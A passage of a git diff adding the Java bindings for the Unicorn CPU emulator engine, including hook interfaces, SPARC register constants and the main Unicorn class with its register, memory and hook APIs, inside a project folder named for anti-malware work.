GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +package unicorn; + +public interface OutHook extends Hook { + + public void hook(Unicorn u, int port, int size, int value, Object user); + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/ReadHook.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/ReadHook.java new file mode 100644 index 0000000..d522a63 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/ReadHook.java @@ -0,0 +1,29 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +package unicorn; + +public interface ReadHook extends Hook { + + public void hook(Unicorn u, long address, int size, Object user); + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/SparcConst.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/SparcConst.java new file mode 100644 index 0000000..de0dc18 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/SparcConst.java @@ -0,0 +1,102 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +package unicorn; + +public interface SparcConst { + +// SPARC registers + + public static final int UC_SPARC_REG_INVALID = 0; + public static final int UC_SPARC_REG_F0 = 1; + public static final int UC_SPARC_REG_F1 = 2; + public static final int UC_SPARC_REG_F2 = 3; + public static final int UC_SPARC_REG_F3 = 4; + public static final int UC_SPARC_REG_F4 = 5; + public static final int UC_SPARC_REG_F5 = 6; + public static final int UC_SPARC_REG_F6 = 7; + public static final int UC_SPARC_REG_F7 = 8; + public static final int UC_SPARC_REG_F8 = 9; + public static final int UC_SPARC_REG_F9 = 10; + public static final int UC_SPARC_REG_F10 = 11; + public static final int UC_SPARC_REG_F11 = 12; + public static final int UC_SPARC_REG_F12 = 13; + public static final int UC_SPARC_REG_F13 = 14; + public static final int UC_SPARC_REG_F14 = 15; + public static final int UC_SPARC_REG_F15 = 16; + public static final int UC_SPARC_REG_F16 = 17; + public static final int UC_SPARC_REG_F17 = 18; + public static final int UC_SPARC_REG_F18 = 19; + public static final int UC_SPARC_REG_F19 = 20; + public static final int UC_SPARC_REG_F20 = 21; + public static final int UC_SPARC_REG_F21 = 22; + public static final int UC_SPARC_REG_F22 = 23; + public static final int UC_SPARC_REG_F23 = 24; + public static final int UC_SPARC_REG_F24 = 25; + public static final int UC_SPARC_REG_F25 = 26; + public static final int UC_SPARC_REG_F26 = 27; + public static final int UC_SPARC_REG_F27 = 28; + public static final int UC_SPARC_REG_F28 = 29; + public static final int UC_SPARC_REG_F29 = 30; + public static final int UC_SPARC_REG_F30 = 31; + public static final int UC_SPARC_REG_F31 = 32; + public static final int UC_SPARC_REG_F32 = 33; + public static final int UC_SPARC_REG_F34 = 34; + public static final int UC_SPARC_REG_F36 = 35; + public static final int UC_SPARC_REG_F38 = 36; + public static final int UC_SPARC_REG_F40 = 37; + public static final int UC_SPARC_REG_F42 = 38; + public static final int UC_SPARC_REG_F44 = 39; + public static final int UC_SPARC_REG_F46 = 40; + public static final int UC_SPARC_REG_F48 = 41; + public static final int UC_SPARC_REG_F50 = 42; + public static final int UC_SPARC_REG_F52 = 43; + public static final int UC_SPARC_REG_F54 = 44; + public static final int UC_SPARC_REG_F56 = 45; + public static final int UC_SPARC_REG_F58 = 46; + public static final int UC_SPARC_REG_F60 = 47; + public static final int UC_SPARC_REG_F62 = 48; + public static final int UC_SPARC_REG_FCC0 = 49; + public static final int UC_SPARC_REG_FCC1 = 50; + public static final int UC_SPARC_REG_FCC2 = 51; + public static final int UC_SPARC_REG_FCC3 = 52; + public static final int UC_SPARC_REG_G0 = 53; + public static final int UC_SPARC_REG_G1 = 54; + public static final int UC_SPARC_REG_G2 = 55; + public static final int UC_SPARC_REG_G3 = 56; + public static final int UC_SPARC_REG_G4 = 57; + public static final int UC_SPARC_REG_G5 = 58; + public static final int UC_SPARC_REG_G6 = 59; + public static final int UC_SPARC_REG_G7 = 60; + public static final int UC_SPARC_REG_I0 = 61; + public static final int UC_SPARC_REG_I1 = 62; + public static final int UC_SPARC_REG_I2 = 63; + public static final int UC_SPARC_REG_I3 = 64; + public static final int UC_SPARC_REG_I4 = 65; + public static final int UC_SPARC_REG_I5 = 66; + public static final int UC_SPARC_REG_FP = 67; + public static final int UC_SPARC_REG_I7 = 68; + public static final int UC_SPARC_REG_ICC = 69; + public static final int UC_SPARC_REG_L0 = 70; + public static final int UC_SPARC_REG_L1 = 71; + public static final int UC_SPARC_REG_L2 = 72; + public static final int UC_SPARC_REG_L3 = 73; + public static final int UC_SPARC_REG_L4 = 74; + public static final int UC_SPARC_REG_L5 = 75; + public static final int UC_SPARC_REG_L6 = 76; + public static final int UC_SPARC_REG_L7 = 77; + public static final int UC_SPARC_REG_O0 = 78; + public static final int UC_SPARC_REG_O1 = 79; + public static final int UC_SPARC_REG_O2 = 80; + public static final int UC_SPARC_REG_O3 = 81; + public static final int UC_SPARC_REG_O4 = 82; + public static final int UC_SPARC_REG_O5 = 83; + public static final int UC_SPARC_REG_SP = 84; + public static final int UC_SPARC_REG_O7 = 85; + public static final int UC_SPARC_REG_Y = 86; + public static final int UC_SPARC_REG_XCC = 87; + public static final int UC_SPARC_REG_PC = 88; + public static final int UC_SPARC_REG_ENDING = 89; + public static final int UC_SPARC_REG_O6 = 84; + public static final int UC_SPARC_REG_I6 = 67; + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/SyscallHook.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/SyscallHook.java new file mode 100644 index 0000000..5b08a11 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/SyscallHook.java @@ -0,0 +1,29 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +package unicorn; + +public interface SyscallHook extends Hook { + + public void hook(Unicorn u, Object user); + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/Unicorn.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/Unicorn.java new file mode 100644 index 0000000..279fdbb --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/Unicorn.java @@ -0,0 +1,825 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +package unicorn; + +import java.util.*; + +public class Unicorn implements UnicornConst, ArmConst, Arm64Const, M68kConst, SparcConst, MipsConst, X86Const { + + private long eng; + private int arch; + private int mode; + + private long blockHandle = 0; + private long interruptHandle = 0; + private long codeHandle = 0; + + private Hashtable eventMemHandles = new Hashtable(); + private long readInvalidHandle = 0; + private long writeInvalidHandle = 0; + private long fetchProtHandle = 0; + private long readProtHandle = 0; + private long writeProtHandle = 0; + + private long readHandle = 0; + private long writeHandle = 0; + private long inHandle = 0; + private long outHandle = 0; + private long syscallHandle = 0; + + private class Tuple { + public Hook function; + public Object data; + public Tuple(Hook f, Object d) { + function = f; + data = d; + } + } + + private ArrayList blockList = new ArrayList(); + private ArrayList intrList = new ArrayList(); + private ArrayList codeList = new ArrayList(); + private ArrayList readList = new ArrayList(); + private ArrayList writeList = new ArrayList(); + private ArrayList inList = new ArrayList(); + private ArrayList outList = new ArrayList(); + private ArrayList syscallList = new ArrayList(); + + private Hashtable > eventMemLists = new Hashtable >(); + + private ArrayList> allLists = new ArrayList>(); + + private static Hashtable eventMemMap = new Hashtable(); + private static Hashtable unicorns = new Hashtable(); + + //required to load native method implementations + static { + System.loadLibrary("unicorn_java"); //loads unicorn.dll or libunicorn.so + eventMemMap.put(UC_HOOK_MEM_READ_UNMAPPED, UC_MEM_READ_UNMAPPED); + eventMemMap.put(UC_HOOK_MEM_WRITE_UNMAPPED, UC_MEM_WRITE_UNMAPPED); + eventMemMap.put(UC_HOOK_MEM_FETCH_UNMAPPED, UC_MEM_FETCH_UNMAPPED); + eventMemMap.put(UC_HOOK_MEM_READ_PROT, UC_MEM_READ_PROT); + eventMemMap.put(UC_HOOK_MEM_WRITE_PROT, UC_MEM_WRITE_PROT); + eventMemMap.put(UC_HOOK_MEM_FETCH_PROT, UC_MEM_FETCH_PROT); + eventMemMap.put(UC_HOOK_MEM_READ, UC_MEM_READ); + eventMemMap.put(UC_HOOK_MEM_WRITE, UC_MEM_WRITE); + eventMemMap.put(UC_HOOK_MEM_FETCH, UC_MEM_FETCH); + eventMemMap.put(UC_HOOK_MEM_READ_AFTER, UC_MEM_READ_AFTER); + } + +/** + * Invoke all UC_HOOK_BLOCK callbacks registered for a specific Unicorn. + * This function gets invoked from the native C callback registered for + * for UC_HOOK_BLOCK + * + * @param eng A Unicorn uc_engine* eng returned by uc_open + * @param address The address of the instruction being executed + * @param size The size of the basic block being executed + * @see hook_add, unicorn.BlockHook + */ + private static void invokeBlockCallbacks(long eng, long address, int size) { + Unicorn u = unicorns.get(eng); + if (u != null) { + for (Tuple p : u.blockList) { + BlockHook bh = (BlockHook)p.function; + bh.hook(u, address, size, p.data); + } + } + } + +/** + * Invoke all UC_HOOK_INTR callbacks registered for a specific Unicorn. + * This function gets invoked from the native C callback registered for + * for UC_HOOK_INTR + * + * @param eng A Unicorn uc_engine* eng returned by uc_open + * @param intno The interrupt number + * @see hook_add, unicorn.InterruptHook + */ + private static void invokeInterruptCallbacks(long eng, int intno) { + Unicorn u = unicorns.get(eng); + if (u != null) { + for (Tuple p : u.intrList) { + InterruptHook ih = (InterruptHook)p.function; + ih.hook(u, intno, p.data); + } + } + } + +/** + * Invoke all UC_HOOK_CODE callbacks registered for a specific Unicorn. + * This function gets invoked from the native C callback registered for + * for UC_HOOK_CODE + * + * @param eng A Unicorn uc_engine* eng returned by uc_open + * @param address The address of the instruction being executed + * @param size The size of the instruction being executed + * @see hook_add, unicorn.CodeHook + */ + private static void invokeCodeCallbacks(long eng, long address, int size) { + Unicorn u = unicorns.get(eng); + if (u != null) { + for (Tuple p : u.codeList) { + CodeHook ch = (CodeHook)p.function; + ch.hook(u, address, size, p.data); + } + } + } + +/** + * Invoke all UC_HOOK_MEM_XXX_UNMAPPED and/or UC_HOOK_MEM_XXX_PROT callbacks registered + * for a specific Unicorn. + * This function gets invoked from the native C callback registered for + * for UC_HOOK_MEM_XXX_UNMAPPED or UC_HOOK_MEM_XXX_PROT + * + * @param eng A Unicorn uc_engine* eng returned by uc_open + * @param type The type of event that is taking place + * @param address Address of instruction being executed + * @param size Size of data being read or written + * @param value Value of data being written to memory, or irrelevant if type = READ. + * @return true to continue, or false to stop program (due to invalid memory). + * @see hook_add, unicorn.EventMemHook + */ + private static boolean invokeEventMemCallbacks(long eng, int type, long address, int size, long value) { + Unicorn u = unicorns.get(eng); + boolean result = true; + if (u != null) { + ArrayList funcList = u.eventMemLists.get(type); + if (funcList != null) { + for (Tuple p : funcList) { + EventMemHook emh = (EventMemHook)p.function; + result &= emh.hook(u, address, size, value, p.data); + } + } + } + return result; + } + +/** + * Invoke all UC_HOOK_MEM_READ callbacks registered for a specific Unicorn. + * This function gets invoked from the native C callback registered for + * for UC_HOOK_MEM_READ + * + * @param eng A Unicorn uc_engine* eng returned by uc_open + * @param address Address of instruction being executed + * @param size Size of data being read + * @see hook_add, unicorn.ReadHook + */ + private static void invokeReadCallbacks(long eng, long address, int size) { + Unicorn u = unicorns.get(eng); + if (u != null) { + for (Tuple p : u.readList) { + ReadHook rh = (ReadHook)p.function; + rh.hook(u, address, size, p.data); + } + } + } + +/** + * Invoke all UC_HOOK_MEM_WRITE callbacks registered for a specific Unicorn. + * This function gets invoked from the native C callback registered for + * for UC_HOOK_MEM_WRITE + * + * @param eng A Unicorn uc_engine* eng returned by uc_open + * @param address Address of instruction being executed + * @param size Size of data being read + * @param value value being written + * @see hook_add, unicorn.WriteHook + */ + private static void invokeWriteCallbacks(long eng, long address, int size, long value) { + Unicorn u = unicorns.get(eng); + if (u != null) { + for (Tuple p : u.writeList) { + WriteHook wh = (WriteHook)p.function; + wh.hook(u, address, size, value, p.data); + } + } + } + +/** + * Invoke all UC_HOOK_INSN callbacks registered for a specific Unicorn. + * This is specifically for the x86 IN instruction. + * This function gets invoked from the native C callback registered for + * for UC_HOOK_INSN + * + * @param eng A Unicorn uc_engine* eng returned by uc_open + * @param port I/O Port number + * @param size Data size (1/2/4) to be read from this port + * @return Data supplied from the input port + * @see hook_add, unicorn.InHook + */ + private static int invokeInCallbacks(long eng, int port, int size) { + Unicorn u = unicorns.get(eng); + int result = 0; + if (u != null) { + for (Tuple p : u.inList) { + InHook ih = (InHook)p.function; + result = ih.hook(u, port, size, p.data); + } + } + return result; + } + +/** + * Invoke all UC_HOOK_INSN callbacks registered for a specific Unicorn. + * This is specifically for the x86 OUT instruction. + * This function gets invoked from the native C callback registered for + * for UC_HOOK_INSN + * + * @param eng A Unicorn uc_engine* eng returned by uc_open + * @param port I/O Port number + * @param size Data size (1/2/4) to be written to this port + * @see hook_add, unicorn.OutHook + */ + private static void invokeOutCallbacks(long eng, int port, int size, int value) { + Unicorn u = unicorns.get(eng); + int result = 0; + if (u != null) { + for (Tuple p : u.outList) { + OutHook oh = (OutHook)p.function; + oh.hook(u, port, size, value, p.data); + } + } + } + +/** + * Invoke all UC_HOOK_INSN callbacks registered for a specific Unicorn. + * This is specifically for the x86 SYSCALL and SYSENTER instruction. + * This function gets invoked from the native C callback registered for + * for UC_HOOK_INSN + * + * @param eng A Unicorn uc_engine* eng returned by uc_open + * @see hook_add, unicorn.SyscallHook + */ + private static void invokeSyscallCallbacks(long eng) { + Unicorn u = unicorns.get(eng); + int result = 0; + if (u != null) { + for (Tuple p : u.syscallList) { + SyscallHook sh = (SyscallHook)p.function; + sh.hook(u, p.data); + } + } + } + +/** + * Write to register. + * + * @param regid Register ID that is to be modified. + * @param value Number containing the new register value + */ + private native void reg_write_num(int regid, Number value) throws UnicornException; + +/** + * Write to register. + * + * @param regid Register ID that is to be modified. + * @param value X86 specific memory management register containing the new register value + */ + private native void reg_write_mmr(int regid, X86_MMR value) throws UnicornException; + +/** + * Read register value. + * + * @param regid Register ID that is to be retrieved. + * @return Number containing the requested register value. + */ + private native Number reg_read_num(int regid) throws UnicornException; + +/** + * Read register value. + * + * @param regid Register ID that is to be retrieved. + * @return X86_MMR containing the requested register value. + */ + private native Number reg_read_mmr(int regid) throws UnicornException; + +/** + * Native access to uc_open + * + * @param arch Architecture type (UC_ARCH_*) + * @param mode Hardware mode. This is combined of UC_MODE_* + */ + private native long open(int arch, int mode) throws UnicornException; + +/** + * Create a new Unicorn object + * + * @param arch Architecture type (UC_ARCH_*) + * @param mode Hardware mode. This is combined of UC_MODE_* + * @see unicorn.UnicornConst + * + */ + public Unicorn(int arch, int mode) throws UnicornException { + //remember these in case we need arch specific code + this.arch = arch; + this.mode = mode; + eng = open(arch, mode); + unicorns.put(eng, this); + allLists.add(blockList); + allLists.add(intrList); + allLists.add(codeList); + allLists.add(readList); + allLists.add(writeList); + allLists.add(inList); + allLists.add(outList); + allLists.add(syscallList); + } + +/** + * Perform native cleanup tasks associated with a Unicorn object + * + */ + protected void finalize() { + unicorns.remove(eng); + close(); + } + +/** + * Return combined API version & major and minor version numbers. + * + * @return hexadecimal number as (major << 8 | minor), which encodes both major & minor versions. + * + * For example Unicorn version 1.2 whould yield 0x0102 + */ + public native static int version(); + +/** + * Determine if the given architecture is supported by this library. + * + * @param arch Architecture type (UC_ARCH_*) + * @return true if this library supports the given arch. + * @see unicorn.UnicornConst + */ + public native static boolean arch_supported(int arch); + +/** + * Close the underlying uc_engine* eng associated with this Unicorn object + * + */ + public native void close() throws UnicornException; + +/** + * Query internal status of engine. + * + * @param type query type. See UC_QUERY_* + * @param result save the internal status queried + * + * @return: error code. see UC_ERR_* + * @see unicorn.UnicornConst + */ + public native int query(int type) throws UnicornException; + +/** + * Report the last error number when some API function fail. + * Like glibc's errno, uc_errno might not retain its old value once accessed. + * + * @return Error code of uc_err enum type (UC_ERR_*, see above) + * @see unicorn.UnicornConst + */ + public native int errno(); + +/** + * Return a string describing given error code. + * + * @param code Error code (see UC_ERR_* above) + * @return Returns a String that describes the error code + * @see unicorn.UnicornConst + */ + public native static String strerror(int code); + +/** + * Write to register. + * + * @deprecated use reg_write(int regid, Object value) instead + * @param regid Register ID that is to be modified. + * @param value Array containing value that will be written into register @regid + */ +@Deprecated + public native void reg_write(int regid, byte[] value) throws UnicornException; + +/** + * Write to register. + * + * @param regid Register ID that is to be modified. + * @param value Object containing the new register value. Long, BigInteger, or + * other custom class used to represent register values + */ + public void reg_write(int regid, Object value) throws UnicornException { + if (value instanceof Number) { + reg_write_num(regid, (Number)value); + } + else if (arch == UC_ARCH_X86 && value instanceof X86_MMR) { + if (regid >= UC_X86_REG_IDTR && regid <= UC_X86_REG_TR) { + reg_write_mmr(regid, (X86_MMR)value); + } + } + else { + throw new ClassCastException("Invalid value type"); + } + } + +/** + * Read register value. + * + * @deprecated use Object reg_read(int regid) instead + * @param regid Register ID that is to be retrieved. + * @param regsz Size of the register being retrieved. + * @return Byte array containing the requested register value. + */ +@Deprecated + public native byte[] reg_read(int regid, int regsz) throws UnicornException; + +/** + * Read register value. + * + * @param regid Register ID that is to be retrieved. + * @return Object containing the requested register value. Long, BigInteger, or + * other custom class used to represent register values + */ + public Object reg_read(int regid) throws UnicornException { + if (arch == UC_ARCH_X86 && regid >= UC_X86_REG_IDTR && regid <= UC_X86_REG_TR) { + return reg_read_mmr(regid); + } + else { + return reg_read_num(regid); + } + } + +/** + * Batch write register values. regids.length == vals.length or UC_ERR_ARG + * + * @param regids Array of register IDs to be written. + * @param vals Array of register values to be written. + */ + public void reg_write_batch(int regids[], Object vals[]) throws UnicornException { + if (regids.length != vals.length) { + throw new UnicornException(strerror(UC_ERR_ARG)); + } + for (int i = 0; i < regids.length; i++) { + reg_write(regids[i], vals[i]); + } + } + +/** + * Batch read register values. + * + * @param regids Array of register IDs to be read. + * @return Array containing the requested register values. + */ + public Object[] reg_read_batch(int regids[]) throws UnicornException { + Object[] vals = new Object[regids.length]; + for (int i = 0; i < regids.length; i++) { + vals[i] = reg_read(regids[i]); + } + return vals; + } + +/** + * Write to memory. + * + * @param address Start addres of the memory region to be written. + * @param bytes The values to be written into memory. bytes.length bytes will be written. + */ + public native void mem_write(long address, byte[] bytes) throws UnicornException; + +/** + * Read memory contents. + * + * @param address Start addres of the memory region to be read. + * @param size Number of bytes to be retrieved. + * @return Byte array containing the contents of the requested memory range. + */ + public native byte[] mem_read(long address, long size) throws UnicornException; + +/** + * Emulate machine code in a specific duration of time. + * + * @param begin Address where emulation starts + * @param until Address where emulation stops (i.e when this address is hit) + * @param timeout Duration to emulate the code (in microseconds). When this value is 0, we will emulate the code in infinite time, until the code is finished. + * @param count The number of instructions to be emulated. When this value is 0, we will emulate all the code available, until the code is finished. + */ + public native void emu_start(long begin, long until, long timeout, long count) throws UnicornException; + +/** + * Stop emulation (which was started by emu_start() ). + * This is typically called from callback functions registered via tracing APIs. + * NOTE: for now, this will stop the execution only after the current block. + */ + public native void emu_stop() throws UnicornException; + +/** + * Hook registration helper for hook types that require no additional arguments. + * + * @param eng Internal unicorn uc_engine* eng associated with hooking Unicorn object + * @param type UC_HOOK_* hook type + * @return Unicorn uch returned for registered hook function + */ + private native static long registerHook(long eng, int type); + +/** + * Hook registration helper for hook types that require one additional argument. + * + * @param eng Internal unicorn uc_engine* eng associated with hooking Unicorn object + * @param type UC_HOOK_* hook type + * @param arg1 Additional varargs argument + * @return Unicorn uch returned for registered hook function + */ + private native static long registerHook(long eng, int type, int arg1); + +/** + * Hook registration helper for hook types that require two additional arguments. + * + * @param eng Internal unicorn uc_engine* eng associated with hooking Unicorn object + * @param type UC_HOOK_* hook type + * @param arg1 First additional varargs argument + * @param arg2 Second additional varargs argument + * @return Unicorn uch returned for registered hook function + */ + private native static long registerHook(long eng, int type, long arg1, long arg2); + +/** + * Hook registration for UC_HOOK_BLOCK hooks. The registered callback function will be + * invoked when a basic block is entered and the address of the basic block (BB) falls in the + * range begin <= BB <= end. For the special case in which begin > end, the callback will be + * invoked whenver any basic block is entered. + * + * @param callback Implementation of a BlockHook interface + * @param begin Start address of hooking range + * @param end End address of hooking range + * @param user_data User data to be passed to the callback function each time the event is triggered + */ + public void hook_add(BlockHook callback, long begin, long end, Object user_data) throws UnicornException { + if (blockHandle == 0) { + blockHandle = registerHook(eng, UC_HOOK_BLOCK, begin, end); + } + blockList.add(new Tuple(callback, user_data)); + } + +/** + * Hook registration for UC_HOOK_INTR hooks. The registered callback function will be + * invoked whenever an interrupt instruction is executed. + * + * @param callback Implementation of a InterruptHook interface + * @param user_data User data to be passed to the callback function each time the event is triggered + */ + public void hook_add(InterruptHook callback, Object user_data) throws UnicornException { + if (interruptHandle == 0) { + interruptHandle = registerHook(eng, UC_HOOK_INTR); + } + intrList.add(new Tuple(callback, user_data)); + } + +/** + * Hook registration for UC_HOOK_CODE hooks. The registered callback function will be + * invoked when an instruction is executed from the address range begin <= PC <= end. For + * the special case in which begin > end, the callback will be invoked for ALL instructions. + * + * @param callback Implementation of a CodeHook interface + * @param begin Start address of hooking range + * @param end End address of hooking range + * @param user_data User data to be passed to the callback function each time the event is triggered + */ + public void hook_add(CodeHook callback, long begin, long end, Object user_data) throws UnicornException { + if (codeHandle == 0) { + codeHandle = registerHook(eng, UC_HOOK_CODE, begin, end); + } + codeList.add(new Tuple(callback, user_data)); + } + +/** + * Hook registration for UC_HOOK_MEM_READ hooks. The registered callback function will be + * invoked whenever a memory read is performed within the address range begin <= read_addr <= end. For + * the special case in which begin > end, the callback will be invoked for ALL memory reads. + * + * @param callback Implementation of a ReadHook interface + * @param begin Start address of memory read range + * @param end End address of memory read range + * @param user_data User data to be passed to the callback function each time the event is triggered + */ + public void hook_add(ReadHook callback, long begin, long end, Object user_data) throws UnicornException { + if (readHandle == 0) { + readHandle = registerHook(eng, UC_HOOK_MEM_READ, begin, end); + } + readList.add(new Tuple(callback, user_data)); + } + +/** + * Hook registration for UC_HOOK_MEM_WRITE hooks. The registered callback function will be + * invoked whenever a memory write is performed within the address range begin <= write_addr <= end. For + * the special case in which begin > end, the callback will be invoked for ALL memory writes. + * + * @param callback Implementation of a WriteHook interface + * @param begin Start address of memory write range + * @param end End address of memory write range + * @param user_data User data to be passed to the callback function each time the event is triggered + */ + public void hook_add(WriteHook callback, long begin, long end, Object user_data) throws UnicornException { + if (writeHandle == 0) { + writeHandle = registerHook(eng, UC_HOOK_MEM_WRITE, begin, end); + } + writeList.add(new Tuple(callback, user_data)); + } + +/** + * Hook registration for UC_HOOK_MEM_WRITE | UC_HOOK_MEM_WRITE hooks. The registered callback function will be + * invoked whenever a memory write or read is performed within the address range begin <= addr <= end. For + * the special case in which begin > end, the callback will be invoked for ALL memory writes. + * + * @param callback Implementation of a MemHook interface + * @param begin Start address of memory range + * @param end End address of memory range + * @param user_data User data to be passed to the callback function each time the event is triggered + */ + public void hook_add(MemHook callback, long begin, long end, Object user_data) throws UnicornException { + hook_add((ReadHook)callback, begin, end, user_data); + hook_add((WriteHook)callback, begin, end, user_data); + } + +/** + * Hook registration for UC_HOOK_MEM_XXX_UNMAPPED and UC_HOOK_MEM_XXX_PROT hooks. + * The registered callback function will be invoked whenever a read or write is + * attempted from an invalid or protected memory address. + * + * @param callback Implementation of a EventMemHook interface + * @param type Type of memory event being hooked such as UC_HOOK_MEM_READ_UNMAPPED or UC_HOOK_MEM_WRITE_PROT + * @param user_data User data to be passed to the callback function each time the event is triggered + */ + public void hook_add(EventMemHook callback, int type, Object user_data) throws UnicornException { + //test all of the EventMem related bits in type + for (Integer htype : eventMemMap.keySet()) { + if ((type & htype) != 0) { //the 'htype' bit is set in type + Long handle = eventMemHandles.get(htype); + if (handle == null) { + eventMemHandles.put(htype, registerHook(eng, htype)); + } + int cbType = eventMemMap.get(htype); + ArrayList flist = eventMemLists.get(cbType); + if (flist == null) { + flist = new ArrayList(); + allLists.add(flist); + eventMemLists.put(cbType, flist); + } + flist.add(new Tuple(callback, user_data)); + } + } + } + +/** + * Hook registration for UC_HOOK_INSN hooks (x86 IN instruction only). The registered callback + * function will be invoked whenever an x86 IN instruction is executed. + * + * @param callback Implementation of a InHook interface + * @param user_data User data to be passed to the callback function each time the event is triggered + */ + public void hook_add(InHook callback, Object user_data) throws UnicornException { + if (inHandle == 0) { + inHandle = registerHook(eng, UC_HOOK_INSN, Unicorn.UC_X86_INS_IN); + } + inList.add(new Tuple(callback, user_data)); + } + +/** + * Hook registration for UC_HOOK_INSN hooks (x86 OUT instruction only). The registered callback + * function will be invoked whenever an x86 OUT instruction is executed. + * + * @param callback Implementation of a OutHook interface + * @param user_data User data to be passed to the callback function each time the event is triggered + */ + public void hook_add(OutHook callback, Object user_data) throws UnicornException { + if (outHandle == 0) { + outHandle = registerHook(eng, UC_HOOK_INSN, Unicorn.UC_X86_INS_OUT); + } + outList.add(new Tuple(callback, user_data)); + } + +/** + * Hook registration for UC_HOOK_INSN hooks (x86 SYSCALL/SYSENTER instruction only). The registered callback + * function will be invoked whenever an x86 SYSCALL or SYSENTER instruction is executed. + * + * @param callback Implementation of a SyscallHook interface + * @param user_data User data to be passed to the callback function each time the event is triggered + */ + public void hook_add(SyscallHook callback, Object user_data) throws UnicornException { + if (syscallHandle == 0) { + syscallHandle = registerHook(eng, UC_HOOK_INSN, Unicorn.UC_X86_INS_SYSCALL); + } + syscallList.add(new Tuple(callback, user_data)); + } + + public void hook_del(Hook hook) throws UnicornException { + for (ArrayList l : allLists) { + for (Tuple t : l) { + if (t.function.equals(hook)) { + allLists.remove(t); + return; + } + } + } + } + +/** + * Map a range of memory. + * + * @param address Base address of the memory range + * @param size Size of the memory block. + * @param perms Permissions on the memory block. A combination of UC_PROT_READ, UC_PROT_WRITE, UC_PROT_EXEC + */ + public native void mem_map(long address, long size, int perms) throws UnicornException; + +/** + * Map existing host memory in for emulation. + * This API adds a memory region that can be used by emulation. + * + * @param address Base address of the memory range + * @param size Size of the memory block. + * @param perms Permissions on the memory block. A combination of UC_PROT_READ, UC_PROT_WRITE, UC_PROT_EXEC + * @param ptr Block of host memory backing the newly mapped memory. This block is + * expected to be an equal or larger size than provided, and be mapped with at + * least PROT_READ | PROT_WRITE. If it is not, the resulting behavior is undefined. + */ + public native void mem_map_ptr(long address, long size, int perms, byte[] block) throws UnicornException; + +/** + * Unmap a range of memory. + * + * @param address Base address of the memory range + * @param size Size of the memory block. + */ + public native void mem_unmap(long address, long size) throws UnicornException; + +/** + * Change permissions on a range of memory. + * + * @param address Base address of the memory range + * @param size Size of the memory block. + * @param perms New permissions on the memory block. A combination of UC_PROT_READ, UC_PROT_WRITE, UC_PROT_EXEC + */ + public native void mem_protect(long address, long size, int perms) throws UnicornException; + +/** + * Retrieve all memory regions mapped by mem_map() and mem_map_ptr() + * NOTE: memory regions may be split by mem_unmap() + * + * @return list of mapped regions. +*/ + public native MemRegion[] mem_regions() throws UnicornException; + +/** + * Allocate a region that can be used with uc_context_{save,restore} to perform + * quick save/rollback of the CPU context, which includes registers and some + * internal metadata. Contexts may not be shared across engine instances with + * differing arches or modes. + * + * @return context handle for use with save/restore. +*/ + public native long context_alloc(); + +/** + * Free a resource allocated within Unicorn. Use for handles + * allocated by context_alloc. + * + * @param Previously allocated Unicorn object handle. +*/ + public native void free(long handle); + +/** + * Save a copy of the internal CPU context. + * This API should be used to efficiently make or update a saved copy of the + * internal CPU state. + * + * @param context handle previously returned by context_alloc. +*/ + public native void context_save(long context); + +/** + * Restore the current CPU context from a saved copy. + * This API should be used to roll the CPU context back to a previous + * state saved by uc_context_save(). + * + * @param context handle previously returned by context_alloc. +*/ + public native void context_restore(long context); + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/UnicornConst.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/UnicornConst.java new file mode 100644 index 0000000..ee5c984 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/UnicornConst.java @@ -0,0 +1,114 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +package unicorn; + +public interface UnicornConst { + public static final int UC_API_MAJOR = 1; + + public static final int UC_API_MINOR = 0; + public static final int UC_VERSION_MAJOR = 1; + + public 